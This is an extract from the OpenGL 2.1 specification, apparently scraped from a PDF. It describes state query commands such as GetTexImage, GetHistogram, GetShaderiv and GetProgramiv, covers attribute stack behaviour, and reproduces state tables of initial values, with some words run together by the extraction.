the buffer’s memory would exceed thesize of the buffer, an INVALID OPERATION error results. If a pixel pack bufferobject is bound and img is not evenly divisible by the number of basic machineunits needed to store in memory a FLOAT, UNSIGNED INT, or UNSIGNED SHORTrespectively, an INVALID OPERATION error results. The command void GetCompressedTexImage( enum target, int lod, void *img );is used to obtain texture images stored in compressed form. The parameters target,lod, and img are interpreted in the same manner as in GetTexImage. When called,GetCompressedTexImage writes n ubytes of compressed image data to thepixel pack buffer or client memory pointed to by img, where n is the value ofTEXTURE COMPRESSED IMAGE SIZE for the texture. The compressed image datais formatted according to the definition of the texture’s internal format. All pixelstorage and pixel transfer modes are ignored when returning a compressed textureimage. Table 6.1: Texture, table, and filter return values. Ri , Gi , Bi , Ai , Li , and Ii arecomponents of the internal format that are assigned to pixel values R, G, B, and A.If a requested pixel value is not present in the internal format, the specified constantvalue is used.not the name of a texture object. obtains the polygon stipple. The pattern is packed into pixel pack buffer or clientmemory according to the procedure given in section 4.3.2 for ReadPixels; it isas if the height and width passed to that command were both equal to 32, the typewere BITMAP, and the format were COLOR INDEX. target must be one of the regular color table names listed in table 3.4. format andtype accept the same values as do the corresponding parameters of GetTexImage,except that a format of DEPTH COMPONENT causes the error INVALID ENUM. Theone-dimensional color table image is returned to pixel pack buffer or client mem-ory starting at table. No pixel transfer operations are performed on this image, butpixel storage modes that are applicable to ReadPixels are performed. Color com-ponents that are requested in the specified format, but which are not included in theinternal format of the color lookup table, are returned as zero. The assignments ofinternal color components to the components requested by format are described intable 6.1. The functions target must be SEPARABLE 2D. format and type accept the same values as do thecorresponding parameters of GetTexImage. The row and column images are re-turned to pixel pack buffer or client memory starting at row and column respec-tively. span is currently unused. Pixel processing and component mapping areidentical to those of GetTexImage. The functions target must be HISTOGRAM. type and format accept the same values as do the corre-sponding parameters of GetTexImage, except that a format of DEPTH COMPONENTcauses the error INVALID ENUM. The one-dimensional histogram table image is re-turned to pixel pack buffer or client memory starting at type. Pixel processing andcomponent mapping are identical to those of GetTexImage, except that instead ofapplying the Final Conversion pixel storage mode, component values are simplyclamped to the range of the target data type. If reset is TRUE, then all counters of all elements of the histogram are reset tozero. Counters are reset whether returned or not. No counters are modified if reset is FALSE. Calling resets all counters of all elements of the histogram table to zero. target must beHISTOGRAM. It is not an error to reset or query the contents of a histogram table with zeroentries. The functions are used for integer and floating point query. target must be HISTOGRAM orPROXY HISTOGRAM. pname is one of HISTOGRAM FORMAT, HISTOGRAM WIDTH,HISTOGRAM RED SIZE, HISTOGRAM GREEN SIZE, HISTOGRAM BLUE SIZE,HISTOGRAM ALPHA SIZE, or HISTOGRAM LUMINANCE SIZE. pname may beHISTOGRAM SINK only for target HISTOGRAM. The value of the specifiedparameter is returned in params. target must be MINMAX. type and format accept the same values as do the corre-sponding parameters of GetTexImage, except that a format of DEPTH COMPONENTcauses the error INVALID ENUM. A one-dimensional image of width 2 is returned to pixel pack buffer or client memory starting at values. Pixel processing andcomponent mapping are identical to those of GetTexImage. If reset is TRUE, then each minimum value is reset to the maximum repre-sentable value, and each maximum value is reset to the minimum representablevalue. All values are reset, whether returned or not. No values are modified if reset is FALSE. Calling void ResetMinmax( enum target );resets all minimum and maximum values of target to to their maximum and mini-mum representable values, respectively, target must be MINMAX. The functions void GetMinmaxParameter{if}v( enum target, enum pname, T params );are used for integer and floating point query. target must be MINMAX. pname isMINMAX FORMAT or MINMAX SINK. The value of the specified parameter is re-turned in params. The version number is either of the form major number.minor number or ma-jor number.minor number.release number, where the numbers all have one ormore digits. The release number and vendor specific information are optional.However, if present, then they pertain to the server and their format and contentsare implementation dependent. GetString returns the version number (returned in the VERSION string) andthe extension names (returned in the EXTENSIONS string) that can be supportedon the connection. Thus, if the client and server support different versions and/orextensions, a compatible version and list of extensions is returned. If pname is CURRENT QUERY, the name of the currently active query for target, orzero if no query is active, will be placed in params. If pname is QUERY COUNTER BITS, the number of bits in the counter for targetwill be placed in params. The number of query counter bits may be zero, in whichcase the counter contains no useful information. Otherwise, the minimum numberof bits allowed is a function of the implementation’s maximum viewport dimen-sions (MAX VIEWPORT DIMS). In this case, the counter must be able to representat least two overdraws for every pixel in the viewport The formula to compute theallowable minimum value (where n is the minimum number of bits) is: If id is not the name of a query object, or if the query object named by id is currentlyactive, then an INVALID OPERATION error is generated. If pname is QUERY RESULT, then the query object’s result value is placed inparams. If the number of query counter bits for target is zero, then the result valueis always 0. There may be an indeterminate delay before the above query returns. Ifpname is QUERY RESULT AVAILABLE, it immediately returns FALSE if such a de-lay would be required, TRUE otherwise. It must always be true that if any queryobject returns result available of TRUE, all queries issued prior to that query mustalso return TRUE. Querying the state for any given query object forces that occlusion query tocomplete within a finite amount of time. If multiple queries are issued on the same target and id prior to calling Get-QueryObject[u]iv, the result returned will always be from the last query issued.The results from any queries before the last one will be lost if the results are notretrieved before starting a new query on the same target and id. returns TRUE if buffer is the name of an buffer object. If buffer is zero, or if buffer isa non-zero value that is not the name of an buffer object, IsBuffer returns FALSE. The command returns TRUE if shader is the name of a shader object. If shader is zero, or a non-zero value that is not the name of a shader object, IsShader returns FALSE. Noerror is generated if shader is not a valid shader object name. The command returns properties of the shader object named shader in params. The parametervalue to return is specified by pname. If pname is SHADER TYPE, VERTEX SHADER is returned if shader is a ver-tex shader object, and FRAGMENT SHADER is returned if shader is a fragmentshader object. If pname is DELETE STATUS, TRUE is returned if the shaderhas been flagged for deletion and FALSE is returned otherwise. If pname isCOMPILE STATUS, TRUE is returned if the shader was last compiled successfully, and FALSE is returned otherwise. If pname is INFO LOG LENGTH, the length ofthe info log, including a null terminator, is returned. If there is no info log, zerois returned. If pname is SHADER SOURCE LENGTH, the length of the concatenationof the source strings making up the shader source, including a null terminator, isreturned. If no source has been defined, zero is returned. The command returns properties of the program object named program in params. The parametervalue to return is specified by pname. If pname is DELETE STATUS, TRUE is returned if the program has been flaggedfor deletion and FALSE is returned otherwise. If pname is LINK STATUS, TRUEis returned if the program was last compiled successfully, and FALSE is returnedotherwise. If pname is VALIDATE STATUS, TRUE is returned if the last call to Val-idateProgram with program was successful, and FALSE is returned otherwise. Ifpname is INFO LOG LENGTH, the length of the info log, including a null terminator,is returned. If there is no info log, 0 is returned. If pname is ATTACHED SHADERS,the number of objects attached is returned. If pname is ACTIVE ATTRIBUTES, thenumber of active attributes in program is returned. If no active attributes exist,0 is returned. If pname is ACTIVE ATTRIBUTE MAX LENGTH, the length of thelongest active attribute name, including a null terminator, is returned. If no ac-tive attributes exist, 0 is returned. If pname is ACTIVE UNIFORMS, the number ofactive uniforms is returned. If no active uniforms exist, 0 is returned. If pnameis ACTIVE UNIFORM MAX LENGTH, the length of the longest active uniform name,including a null terminator, is returned. If no active uniforms exist, 0 is returned. The command returns the names of shader objects attached to program in shaders. The actualnumber of shader names written into shaders is returned in count. If no shaders are attached, count is set to zero. If count is NULL then it is ignored. The maximumnumber of shader names that may be written into shaders is specified by maxCount.The number of objects attached to program is given by can be queried by callingGetProgramiv with ATTACHED SHADERS. A string that contains information about the last compilation attempt on ashader object or last link or validation attempt on a program object, called theinfo log, can be obtained with the commands These commands return the info log string in infoLog. This string will be nullterminated. The actual number of characters written into infoLog, excluding thenull terminator, is returned in length. If length is NULL, then no length is returned.The maximum number of characters that may be written into infoLog, includingthe null terminator, is specified by bufSize. The number of characters in the infolog can be queried with GetShaderiv or GetProgramiv with INFO LOG LENGTH.If shader is a shader object, the returned info log will either be an empty stringor it will contain information about the last compilation attempt for that object. Ifprogram is a program object, the returned info log will either be an empty string orit will contain information about the last link attempt or last validation attempt forthat object. The info log is typically only useful during application development and anapplication should not expect different GL implementations to produce identicalinfo logs. The command returns in source the string making up the source code for the shader object shader.The string source will be null terminated. The actual number of characters writteninto source, excluding the null terminator, is returned in length. If length is NULL,no length is returned. The maximum number of characters that may be written intosource, including the null terminator, is specified by bufSize. The string source isa concatenation of the strings passed to the GL using ShaderSource. The lengthof this concatenation is given by SHADER SOURCE LENGTH, which can be queriedwith GetShaderiv. The commands obtain the vertex attribute state named by pname for the generic ver-tex attribute numbered index and places the information in the arrayparams. pname must be one of VERTEX ATTRIB ARRAY BUFFER BINDING,VERTEX ATTRIB ARRAY ENABLED, VERTEX ATTRIB ARRAY SIZE,VERTEX ATTRIB ARRAY STRIDE, VERTEX ATTRIB ARRAY TYPE,VERTEX ATTRIB ARRAY NORMALIZED, or CURRENT VERTEX ATTRIB. Note thatall the queries except CURRENT VERTEX ATTRIB return client state. Theerror INVALID VALUE is generated if index is greater than or equal toMAX VERTEX ATTRIBS. All but CURRENT VERTEX ATTRIB return information about generic vertex at-tribute arrays. The enable state of a generic vertex attribute array is set by thecommand EnableVertexAttribArray and cleared by DisableVertexAttribArray.The size, stride, type and normalized flag are set by the command VertexAttrib-Pointer. The query CURRENT VERTEX ATTRIB returns the current value for thegeneric attribute index. In this case the error INVALID OPERATION is generated ifindex is zero, as there is no current value for generic attribute zero. The command obtains the pointer named pname for vertex attribute numbered indexand places the information in the array pointer. pname must beVERTEX ATTRIB ARRAY POINTER. The INVALID VALUE error is generated if in-dex is greater than or equal to MAX VERTEX ATTRIBS. The commands return the value or values of the uniform at location location for program objectprogram in the array params. The type of the uniform at location determines the reset the values of those state variables that were saved with the last correspondingPushAttrib or PopClientAttrib. Those not saved remain unchanged. The er-ror STACK UNDERFLOW is generated if PopAttrib or PopClientAttrib is executedwhile the respective stack is empty. Table 6.2 shows the attribute groups with their corresponding symbolic con-stant names and stacks. When PushAttrib is called with TEXTURE BIT set, the priorities, border col-ors, filter modes, wrap modes, and other state of the currently bound texture objects(see table 6.17), as well as the current texture bindings and enables, are pushed onto the attribute stack. (Unbound texture objects are not pushed or restored.) When anattribute set that includes texture information is popped, the bindings and enablesare first restored to their pushed values, then the bound texture object’s parametersare restored to their pushed values. Operations on attribute groups push or pop texture state within that group forall texture units. When state for a group is pushed, all state corresponding toTEXTURE0 is pushed first, followed by state corresponding to TEXTURE1, and soon up to and including the state corresponding to TEXTUREk where k + 1 is thevalue of MAX TEXTURE UNITS. When state for a group is popped, texture state isrestored in the opposite order that it was pushed, starting with state correspondingto TEXTUREk and ending with TEXTURE0. Identical rules are observed for clienttexture state push and pop operations. Matrix stacks are never pushed or poppedwith PushAttrib, PushClientAttrib, PopAttrib, or PopClientAttrib. The depth of each attribute stack is implementation dependent but must be atleast 16. The state required for each attribute stack is potentially 16 copies of eachstate variable, 16 masks indicating which groups of variables are stored in eachstack entry, and an attribute stack pointer. In the initial state, both attribute stacksare empty. In the tables that follow, a type is indicated for each variable. Table 6.3 ex-plains these types. The type actually identifies all state associated with the indi-cated description; in certain cases only a portion of this state is returned. Thisis the case with all matrices, where only the top entry on the stack is returned;with clip planes, where only the selected clip plane is returned, with parametersdescribing lights, where only the value pertaining to the selected light is returned;with textures, where only the selected texture or texture parameter is returned; andwith evaluator maps, where only the selected map is returned. Finally, a “–” in theattribute column indicates that the indicated value is not included in any attributegroup (and thus can not be pushed or popped with PushAttrib, PushClientAttrib,PopAttrib, or PopClientAttrib). The M and m entries for initial minmax table values represent the maximumand minimum possible representable values, respectively. ables for which IsEnabled is listed as the query command can also be obtainedusing GetBooleanv, GetIntegerv, GetFloatv, and GetDoublev. State variablesfor which any other command is listed as the query command can be obtained onlyby using that command. State table entries which are required only by the imaging subset (see sec-tion 3.6.2) are typeset against a gray background . Get Initial Get value Type Command Value Description Sec. Attribute TEXTURE COORD ARRAY 2 ∗ ×B IsEnabled False Texture coordinate array 2.8 vertex-array enable TEXTURE COORD ARRAY SIZE 2 ∗ ×Z + GetIntegerv 4 Coordinates per element 2.8 vertex-array TEXTURE COORD ARRAY TYPE 2 ∗ ×Z4 GetIntegerv FLOAT Type of texture 2.8 vertex-array coordinates TEXTURE COORD ARRAY STRIDE 2 ∗ ×Z + GetIntegerv 0 Stride between texture 2.8 vertex-array coordinates TEXTURE COORD ARRAY POINTER 2 ∗ ×Y GetPointerv 0 Pointer to the texture 2.8 vertex-array coordinate array VERTEX ATTRIB ARRAY ENABLED 16 + ×B GetVertexAttrib False Vertex attrib array enable 2.8 vertex-array VERTEX ATTRIB ARRAY SIZE 16 + ×Z GetVertexAttrib 4 Vertex attrib array size 2.8 vertex-array VERTEX ATTRIB ARRAY STRIDE 16 + ×Z + GetVertexAttrib 0 Vertex attrib array stride 2.8 vertex-array VERTEX ATTRIB ARRAY TYPE 16 + ×Z4 GetVertexAttrib FLOAT Vertex attrib array type 2.8 vertex-array VERTEX ATTRIB ARRAY NORMALIZED 16 + ×B GetVertexAttrib False Vertex attrib array 2.8 vertex-array normalized VERTEX ATTRIB ARRAY POINTER 16 + ×P GetVertex- NULL Vertex attrib array 2.8 vertex-array NORMAL ARRAY BUFFER BINDING Z+ GetIntegerv 0 Normal array buffer 2.9 vertex-array binding COLOR ARRAY BUFFER BINDING Z+ GetIntegerv 0 Color array buffer 2.9 vertex-array binding INDEX ARRAY BUFFER BINDING Z+ GetIntegerv 0 Index array buffer 2.9 vertex-array binding TEXTURE COORD ARRAY BUFFER BINDING 2 ∗ ×Z + GetIntegerv 0 Texcoord array buffer 2.9 vertex-array binding EDGE FLAG ARRAY BUFFER BINDING Z+ GetIntegerv 0 Edge flag array buffer 2.9 vertex-array binding SECONDARY COLOR ARRAY BUFFER BINDING Z+ GetIntegerv 0 Secondary color array 2.9 vertex-array buffer binding Get Initial Get value Type Command Value Description Sec. Attribute – n × BM U GetBufferSubData - buffer data 2.9 - BUFFER SIZE n × Z+ GetBufferParameteriv 0 Buffer data size 2.9 - BUFFER USAGE n × Z9 GetBufferParameteriv STATIC DRAW Buffer usage pattern 2.9 - BUFFER ACCESS n × Z3 GetBufferParameteriv READ WRITE Buffer access flag 2.9 - BUFFER MAPPED n×B GetBufferParameteriv FALSE Buffer map flag 2.9 - BUFFER MAP POINTER n×Y GetBufferPointerv NULL Mapped buffer pointer 2.9 - VIEWPORT 4×Z GetIntegerv see 2.11.1 Viewport origin & extent 2.11.1 viewport DEPTH RANGE 2 × R+ GetFloatv 0,1 Depth range near & far 2.11.1 viewport COLOR MATRIX STACK DEPTH Z+ GetIntegerv 1 Color matrix stack 3.6.3 – pointer MODELVIEW STACK DEPTH Z+ GetIntegerv 1 Model-view matrix stack 2.11.2 – pointer PROJECTION STACK DEPTH Z+ GetIntegerv 1 Projection matrix stack 2.11.2 – pointer TEXTURE STACK DEPTH 2 ∗ ×Z + GetIntegerv 1 Texture matrix stack 2.11.2 – pointer Get Initial Get value Type Command Value Description Sec. Attribute FOG COLOR C GetFloatv 0,0,0,0 Fog color 3.10 fog FOG INDEX CI GetFloatv 0 Fog index 3.10 fog FOG DENSITY R GetFloatv 1.0 Exponential fog density 3.10 fog FOG START R GetFloatv 0.0 Linear fog start 3.10 fog FOG END R GetFloatv 1.0 Linear fog end 3.10 fog FOG MODE Z3 GetIntegerv EXP Fog mode 3.10 fog FOG B IsEnabled False True if fog enabled 3.10 fog/enable FOG COORD SRC Z2 GetIntegerv FRAGMENT DEPTH Source of coordinate for fog 3.10 fog properties tracking current color COLOR MATERIAL FACE Z3 GetIntegerv FRONT AND BACK Face(s) affected 2.14.3 lighting by color tracking AMBIENT 2×C GetMaterialfv (0.2,0.2,0.2,1.0) Ambient material 2.14.1 lighting color DIFFUSE 2×C GetMaterialfv (0.8,0.8,0.8,1.0) Diffuse material 2.14.1 lighting color SPECULAR 2×C GetMaterialfv (0.0,0.0,0.0,1.0) Specular material 2.14.1 lighting color EMISSION 2×C GetMaterialfv (0.0,0.0,0.0,1.0) Emissive mat. 2.14.1 lighting color Get Initial Get value Type Command Value Description Sec. Attribute AMBIENT 8 ∗ ×C GetLightfv (0.0,0.0,0.0,1.0) Ambient intensity of light i 2.14.1 lighting DIFFUSE 8 ∗ ×C GetLightfv see table 2.10 Diffuse intensity of light i 2.14.1 lighting SPECULAR 8 ∗ ×C GetLightfv see table 2.10 Specular intensity of light i 2.14.1 lighting POSITION 8 ∗ ×P GetLightfv (0.0,0.0,1.0,0.0) Position of light i 2.14.1 lighting CONSTANT ATTENUATION 8 ∗ ×R+ GetLightfv 1.0 Constant atten. factor 2.14.1 lighting LINEAR ATTENUATION 8 ∗ ×R+ GetLightfv 0.0 Linear atten. factor 2.14.1 lighting QUADRATIC ATTENUATION 8 ∗ ×R+ GetLightfv 0.0 Quadratic atten. factor 2.14.1 lighting SPOT DIRECTION 8 ∗ ×D GetLightfv (0.0,0.0,-1.0) Spotlight direction of light i 2.14.1 lighting SPOT EXPONENT 8 ∗ ×R+ GetLightfv 0.0 Spotlight exponent of light i 2.14.1 lighting SPOT CUTOFF 8 ∗ ×R+ GetLightfv 180.0 Spot. angle of light i 2.14.1 lighting LIGHTi 8 ∗ ×B IsEnabled False True if light i enabled 2.14.1 lighting/enable mode rasterization POLYGON OFFSET FILL B IsEnabled False Polygon offset enable for FILL 3.5.5 polygon/enable mode rasterization – I GetPolygonStipple 1’s Polygon stipple 3.5 polygon-stipple POLYGON STIPPLE B IsEnabled False Polygon stipple enable 3.5.2 polygon/enable 280 Get Initial Get value Type Command Value Description Sec. Attribute MULTISAMPLE B IsEnabled True Multisample rasterization 3.2.1 multisample/enable SAMPLE ALPHA TO COVERAGE B IsEnabled False Modify coverage from alpha 4.1.3 multisample/enable SAMPLE ALPHA TO ONE B IsEnabled False Set alpha to maximum 4.1.3 multisample/enable SAMPLE COVERAGE B IsEnabled False Mask to modify coverage 4.1.3 multisample/enable SAMPLE COVERAGE VALUE R+ GetFloatv 1 Coverage mask value 4.1.3 multisample SAMPLE COVERAGE INVERT B GetBooleanv False Invert coverage mask value 4.1.3 multisample texturing is enabled TEXTURE BINDING xD 2 ∗ ×3 × Z + GetIntegerv 0 Texture object bound to 3.8.12 texture TEXTURE xD TEXTURE BINDING CUBE MAP 2 ∗ ×Z + GetIntegerv 0 Texture object bound to 3.8.11 texture TEXTURE CUBE MAP TEXTURE xD n×I GetTexImage see 3.8 xD texture image at 3.8 – l.o.d. i TEXTURE CUBE MAP POSITIVE X n×I GetTexImage see 3.8.1 +x face cube map 3.8.1 – texture image at l.o.d. i TEXTURE CUBE MAP NEGATIVE X n×I GetTexImage see 3.8.1 −x face cube map 3.8.1 – texture image at l.o.d. i TEXTURE CUBE MAP POSITIVE Y n×I GetTexImage see 3.8.1 +y face cube map 3.8.1 – texture image at l.o.d. i Table 6.16. Textures (state per texture unit and binding point) 281 Get Initial 282 compressed texture image Get Initial 284 RGB SCALE 2 ∗ ×R3 GetTexEnvfv 1.0 RGB post-combiner scaling 3.8.13 texture ALPHA SCALE 2 ∗ ×R3 GetTexEnvfv 1.0 Alpha post-combiner scaling 3.8.13 texture Get Initial Get value Type Command Value Description Sec. Attribute SCISSOR TEST B IsEnabled False Scissoring enabled 4.1.2 scissor/enable SCISSOR BOX 4×Z GetIntegerv see 4.1.2 Scissor box 4.1.2 scissor ALPHA TEST B IsEnabled False Alpha test enabled 4.1.4 color-buffer/enable 6.2. STATE TABLES ALPHA TEST FUNC Z8 GetIntegerv ALWAYS Alpha test function 4.1.4 color-buffer ALPHA TEST REF R+ GetIntegerv 0 Alpha test reference value 4.1.4 color-buffer STENCIL TEST B IsEnabled False Stenciling enabled 4.1.5 stencil-buffer/enable STENCIL FUNC Z8 GetIntegerv ALWAYS Front stencil function 4.1.5 stencil-buffer STENCIL VALUE MASK Z+ GetIntegerv 1’s Front stencil mask 4.1.5 stencil-buffer STENCIL REF Z+ GetIntegerv 0 Front stencil reference value 4.1.5 stencil-buffer STENCIL FAIL Z8 GetIntegerv KEEP Front stencil fail action 4.1.5 stencil-buffer STENCIL PASS DEPTH FAIL Z8 GetIntegerv KEEP Front stencil depth buffer fail action 4.1.5 stencil-buffer STENCIL PASS DEPTH PASS Z8 GetIntegerv KEEP Front stencil depth buffer pass 4.1.5 stencil-buffer action STENCIL BACK FUNC Z8 GetIntegerv ALWAYS Back stencil function 4.1.5 stencil-buffer STENCIL BACK VALUE MASK Z+ GetIntegerv 1’s Back stencil mask 4.1.5 stencil-buffer Get Initial Get value Type Command Value Description Sec. Attribute BLEND B IsEnabled False Blending enabled 4.1.8 color-buffer/enable BLEND SRC RGB (v1.3:BLEND SRC) Z15 GetIntegerv ONE Blending source RGB 4.1.8 color-buffer function BLEND SRC ALPHA Z15 GetIntegerv ONE Blending source A 4.1.8 color-buffer function BLEND DST RGB (v1.3:BLEND DST) Z14 GetIntegerv ZERO Blending dest. RGB 4.1.8 color-buffer function BLEND DST ALPHA Z14 GetIntegerv ZERO Blending dest. A 4.1.8 color-buffer function BLEND EQUATION RGB Z5 GetIntegerv FUNC ADD RGB blending equation 4.1.8 color-buffer (v1.5: BLEND EQUATION) BLEND EQUATION ALPHA Z5 GetIntegerv FUNC ADD Alpha blending equation 4.1.8 color-buffer BLEND COLOR C GetFloatv 0,0,0,0 Constant blend color 4.1.8 color-buffer DRAW BUFFERi 1+ × Z10∗ GetIntegerv see 4.2.1 Draw buffer selected for output 4.2.1 color-buffer color i DRAW BUFFER Z10∗ GetIntegerv see 4.2.1 Draw buffer selected for output 4.2.1 color-buffer color 0 INDEX WRITEMASK Z+ GetIntegerv 1’s Color index writemask 4.2.2 color-buffer COLOR WRITEMASK 4×B GetBooleanv True Color write enables; R, G, B, or A 4.2.2 color-buffer DEPTH WRITEMASK B GetBooleanv True Depth buffer enabled for writing 4.2.2 depth-buffer STENCIL WRITEMASK Z+ GetIntegerv 1’s Front stencil buffer writemask 4.2.2 stencil-buffer STENCIL BACK WRITEMASK Z+ GetIntegerv 1’s Back stencil buffer writemask 4.2.2 stencil-buffer COLOR CLEAR VALUE C GetFloatv 0,0,0,0 Color buffer clear value (RGBA 4.2.3 color-buffer mode) INDEX CLEAR VALUE CI GetFloatv 0 Color buffer clear value (color 4.2.3 color-buffer index mode) Get Initial Get value Type Command Value Description Sec. Attribute UNPACK SWAP BYTES B GetBooleanv False Value of UNPACK SWAP BYTES 3.6.1 pixel-store UNPACK LSB FIRST B GetBooleanv False Value of UNPACK LSB FIRST 3.6.1 pixel-store UNPACK IMAGE HEIGHT Z+ GetIntegerv 0 Value of 3.6.1 pixel-store UNPACK IMAGE HEIGHT UNPACK SKIP IMAGES Z+ GetIntegerv 0 Value of UNPACK SKIP IMAGES 3.6.1 pixel-store UNPACK ROW LENGTH Z+ GetIntegerv 0 Value of UNPACK ROW LENGTH 3.6.1 pixel-store UNPACK SKIP ROWS Z+ GetIntegerv 0 Value of UNPACK SKIP ROWS 3.6.1 pixel-store UNPACK SKIP PIXELS Z+ GetIntegerv 0 Value of UNPACK SKIP PIXELS 3.6.1 pixel-store UNPACK ALIGNMENT Z+ GetIntegerv 4 Value of UNPACK ALIGNMENT 3.6.1 pixel-store PACK SWAP BYTES B GetBooleanv False Value of PACK SWAP BYTES 4.3.2 pixel-store PACK LSB FIRST B GetBooleanv False Value of PACK LSB FIRST 4.3.2 pixel-store PACK IMAGE HEIGHT Z+ GetIntegerv 0 Value of PACK IMAGE HEIGHT 4.3.2 pixel-store PACK SKIP IMAGES Z+ GetIntegerv 0 Value of PACK SKIP IMAGES 4.3.2 pixel-store PACK ROW LENGTH Z+ GetIntegerv 0 Value of PACK ROW LENGTH 4.3.2 pixel-store PACK SKIP ROWS Z+ GetIntegerv 0 Value of PACK SKIP ROWS 4.3.2 pixel-store POST COLOR MATRIX COLOR TABLE B IsEnabled False True if post color matrix 3.6.3 pixel/enable color table lookup is done COLOR TABLE I GetColorTable empty Color table 3.6.3 – POST CONVOLUTION COLOR TABLE I GetColorTable empty Post convolution color 3.6.3 – table POST COLOR MATRIX COLOR TABLE I GetColorTable empty Post color matrix color 3.6.3 – table COLOR TABLE FORMAT 2 × 3 × Z42 GetColorTable- RGBA Color tables’ internal 3.6.3 – Parameteriv image format COLOR TABLE WIDTH 2 × 3 × Z+ GetColorTable- 0 Color tables’ specified 3.6.3 – Parameteriv width Get Initial Get value Type Command Value Description Sec. Attribute CONVOLUTION 1D B IsEnabled False True if 1D convolution is 3.6.3 pixel/enable done CONVOLUTION 2D B IsEnabled False True if 2D convolution is 3.6.3 pixel/enable done SEPARABLE 2D B IsEnabled False True if separable 2D 3.6.3 pixel/enable convolution is done CONVOLUTION xD 2×I GetConvolution- empty Convolution filters; x is 3.6.3 – Filter 1 or 2 SEPARABLE 2D 2×I GetSeparable- Fil- empty Separable convolution 3.6.3 – ter filter CONVOLUTION BORDER COLOR 3×C GetConvolution- 0,0,0,0 Convolution border color 3.6.5 pixel Parameterfv CONVOLUTION BORDER MODE 3 × Z4 GetConvolution- REDUCE Convolution border 3.6.5 pixel Parameteriv mode CONVOLUTION FILTER SCALE 3 × R4 GetConvolution- 1,1,1,1 Scale factors applied to 3.6.3 pixel Parameterfv convolution filter entries
https://www.scribd.com/document/38943941/glspec21-20061201
CC-MAIN-2019-43
refinedweb
46,040
53
Thread.Join Method () Blocks the calling thread until the thread represented by this instance terminates, while continuing to perform standard COM and SendMessage pumping. Assembly: mscorlib (in mscorlib.dll). In the following example, the Thread1 thread calls the Join() method of Thread2, which causes Thread1 to block until Thread2 has completed. using System; using System.Threading; public class Example { static Thread thread1, thread2; public static void Main() { thread1 = new Thread(ThreadProc); thread1.Name = "Thread1"; thread1.Start(); thread2 = new Thread(ThreadProc); thread2.Name = "Thread2"; thread2.Start(); } private static void ThreadProc() { Console.WriteLine("\nCurrent thread: {0}", Thread.CurrentThread.Name); if (Thread.CurrentThread.Name == "Thread1" && thread2.ThreadState != ThreadState.Unstarted) thread2.Join(); Thread.Sleep(4000); Console.WriteLine("\nCurrent thread: {0}", Thread.CurrentThread.Name); Console.WriteLine("Thread1: {0}", thread1.ThreadState); Console.WriteLine("Thread2: {0}\n", thread2.ThreadState); } } // The example displays output like the following: // Current thread: Thread1 // // Current thread: Thread2 // // Current thread: Thread2 // Thread1: WaitSleepJoin // Thread2: Running // // // Current thread: Thread1 // Thread1: Running // Thread2: Stopped If the thread has already terminated when Join is called, the method returns immediately. This method changes the state of the calling thread to include ThreadState.WaitSleepJoin. You cannot invoke Join on a thread that is in the ThreadState.Unstarted state. Available since 1.1 Silverlight Available since 2.0 Windows Phone Silverlight Available since 7.0
https://msdn.microsoft.com/en-us/library/95hbf2ta
CC-MAIN-2016-44
refinedweb
216
54.29
Opened 9 years ago Closed 9 years ago Last modified 9 years ago #3877 closed (duplicate) Newforms and i18n bug Description Here is how I define a form in my views: class MyForm(forms.Form): name = forms.CharField(label=_('Name')) ... The problem is _('Name') is translated when I restart the server (Django or Apache), but not when I switch the browser locale. I tried both from django.utils.translation import gettext_lazy as _ and from django.utils.translation import gettext as _ Change History (2) comment:1 Changed 9 years ago by comment:2 Changed 9 years ago by Thanks. I thought this was already reported somewhere, but I couldn't find it. Duplicate: #3600
https://code.djangoproject.com/ticket/3877
CC-MAIN-2016-40
refinedweb
117
65.01
please provide appropriate....... nice Post... declaration of variable of other type, array is declared and it has two parts, one... will hold an array. Similarly like above declaration you can declare array Java Array Declaration Java Array Declaration As we declare a variable in Java, An Array variable is declared the same way. Array variable has a type and a valid Java identifier i.e. the array's Array declaration in Java ] Multidimensional Array Multidimensional arrays are arrays of arrays. Declaration of two... Java Array Declaration Java Array declaration Java Array Initialization C Array Declaration C Array Declaration In this section, you will learn how to declare an array in C. To declare an array in C, you have to specify the name of the data type and the number IN JSP In this Section, we will discuss about declaration of variables & method in JSP using declaration tags. Using Declaration Tag, you... declaration with a semicolon. The declaration must be valid in the Java an array in a program: Declaration of an Array Construction...An Array is the static memory allocation that holds a fixed number of values of same type in memory. The size or length of an array is fixed when the array Namespace Declaration Namespace Declaration: The term namespace is very much common in OOP based language, basically it is a collection of classes, objects and functions. Namespaces are one of the new feature in PHP 5.3.0. Naming collision of classes Array in java in memory at fixed size. We can use multiple type array. It can be used in Java, C... There are many syntax Declaration of an array:- int [] anArray; ...Array in java In following example we will discuss about Array in Java. Array are using JavaScript as scripting language. Array Declaration... in Understanding Array Declaration. For this we are using JavaScript as scripting... JavaScript Array   Java - Array in Java - dimensional or can say multi - dimensional. Declaration of an array:  ... of the program: C:\chandan>javac array.java C:\chandan>java array Given number... Array Example - Array in Java   array array write and test a function named mirror that is passed an array of n floats and returns a newly created array that contains those n floats... the array {10.1,11.2,8.3,7.5,22} into{22,7.5,8.3,11.2,10.1 how many way to declare array?explore it?Hritish Choudhary April 12, 2012 at 9:15 AM please provide appropriate....... c programingDurgesh swarnkar May 3, 2013 at 12:41 AM nice Post your Comment
http://roseindia.net/discussion/23739-C-Array-Declaration.html
CC-MAIN-2016-07
refinedweb
429
50.43
I came across a really good library recently called Numl. Numl is a .NET library that aims to make Machine Learning much more accessible to developers by abstracting away all the complex parts. What is Machine Learning I hear you say. Machine Learning can be described as (and this is a quote from the Numl site). The. Numl does this via supervised and unsupervised learning. These are : -. Supervised learning is that part that I find most interesting and useful for my purposes. When using supervised learning you provide a labelled set of examples, and this can be provided as lists of objects, data tables etc. These data sets contain examples of how decisions were made previously. This collections of objects is then converted into a matrix and a vector. The matrix columns represent each feature used to make decisions while each row represents a numerical representation of each object. The vector is a list of answers corresponding to each matrix row. The Descriptor object is a mapping between object properties and their corresponding numerical representation. The computer then uses the previously generated data to train a model. The shape of the model depends entirely on the learning algorithm chosen. It can be a single vector, a tree, or even a collection of points.This model will then predict the target label given a new object of the same shape used during training. Supervised Learning – Simple Example Numl is very easy to set-up in Visual Studio. The library is managed by NuGet. So, from the NuGet console, you just need to type : Install-Package numl I will quickly run through the simple example used on the Numl site. Obviously this is a very simplistic example, but it will give you a good idea of what to expect. In this example we want to determine whether under certain weather conditions that is it ok to play a game of Tennis. First lets look at some sample data. This is just static hard coded data, normally you would use a larger data set from a database etc. public enum Outlook { Sunny, Overcast, Rainy } public enum Temperature { Low, High } public class Tennis { [Feature] public Outlook Outlook { get; set; } 